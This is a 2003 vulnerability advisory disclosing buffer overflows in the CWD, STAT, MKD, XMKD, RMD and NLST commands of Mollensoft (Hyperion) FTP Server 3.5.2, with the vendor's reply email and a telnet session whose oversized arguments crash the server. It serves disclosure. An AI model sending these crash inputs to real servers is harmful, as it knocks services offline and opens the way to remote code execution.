Mollensoft FTP Server 3.5.2 ( or Hyperion ftp server)

Release Date:
June 4, 2003

Severity:
High (remote crash - code execution)


Systems Affected: 
Mollensoft FTP Server 3.5.2 (possibly all older versions)


Here is the email i got from the company when i informed them about the holes:
----------------------------------------------------------------------------------
From services@mollensoft.com Wed Jun 4 18 :	33:50 2003
Return-Path :	<services@mollensoft.com>
Received :	from mta2.wss.scd.yahoo.com (mta2.wss.scd.yahoo.com [66.218.85.33]) by monster.phaistosnetworks.gr (8.12.8/8.12.8) with ESMTP id h54FXlQN003884 for <dr_insane@pathfinder.gr>; Wed, 4 Jun 2003 18:33:48 +0300
Received :	from dragonultra (66.91.163.96) by mta2.wss.scd.yahoo.com (7.0.016) (authenticated as services@mollensoft.com) id 3EDCE7600005EB6A for dr_insane@pathfinder.gr; Wed, 4 Jun 2003 08:30:55 -0700
From :	"Services" <services@mollensoft.com>   
To :	XXXX XXXXX <dr_insane@pathfinder.gr>
topic :	RE: Mollensoft FTP Server 3.5.2 ( or Hyperion ftp server) SECURITY ADVISORY
date :	Wed, 4 Jun 2003 05:30:34 -0700
Message-ID :	<DCEKIJFAJAMEECNLIANBEEGACIAA.services@mollensoft.com>
MIME-Version :	1.0
Content-Type :	text/plain; charset="Windows-1252"
Content-Transfer-Encoding :	8bit
X-Priority :	3 (Normal)
X-MSMail-Priority :	Normal
X-Mailer :	Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MIMEOLE :	Produced By Microsoft MimeOLE V6.00.2600.0000
Importance :	Normal
In-reply-to :	<200306041525.h54FPe0p029006@monster.phaistosnetworks.gr>

Howdy,
Thank you very much. I am working on a fix,
should be out soon.  Thanks for your help.

V/R,
BIGAL
bigal@mollensoft.com

-----Original Message-----
From: xxxxx xxxxxx [mailto:dr_insane@pathfinder.gr]
Sent: Wednesday, June 04, 2003 8:26 AM
To: support@mollensoft.com
Subject: Mollensoft FTP Server 3.5.2 ( or Hyperion ftp server) SECURITY
ADVISORY


Hello,

Yesterday i downloaded Mollensoft FTP Server 3.5.2. While i was checking it
i found some serious buffer overflows in the cwd,mkd,rmd,stat,nlst commands.
I am sending you an advisory in order to fix the problems.

i hope you will respond!

---------------------------------------------------------------------------

Description:
Many buffer overflow discovered while i was checking the last version of Hyperion Ftp server.Any user
can exploit these vulnerabilities to crash the server remotely or to execute arbitary code ( an exploit will
be released for this).Various structures can be overwritten in the process heap to gain control of the remote
Ftp server with administrator privileges.


Let's r0ck (or exploit code
----------------------------
The following examples will show the vulnerable conditions.


C:\>telnet localhost 21
220 Mollensoft FTP Server 3.5.2 Ready.
user anonymous
331 Password required for anonymous.
pass ins@qwerty.gr
230 User anonymous logged in.

CWD 344 * A

overflow..crash...

Stat 340 * A

overflow..crash...

mkd 270 * A

overflow..crash...

xmkd 270 * A

overflow..crash...

rmd 270 * A

overflow..crash...

nlst 340 * A

overflow..crash...

By supplying one of these commands above the ftp server will crash:>


Credit:
Dr_insane


Feedback:
Please send comments to:

dr_insane@pathfinder.gr
http://members.lycos.co.uk/r34ct/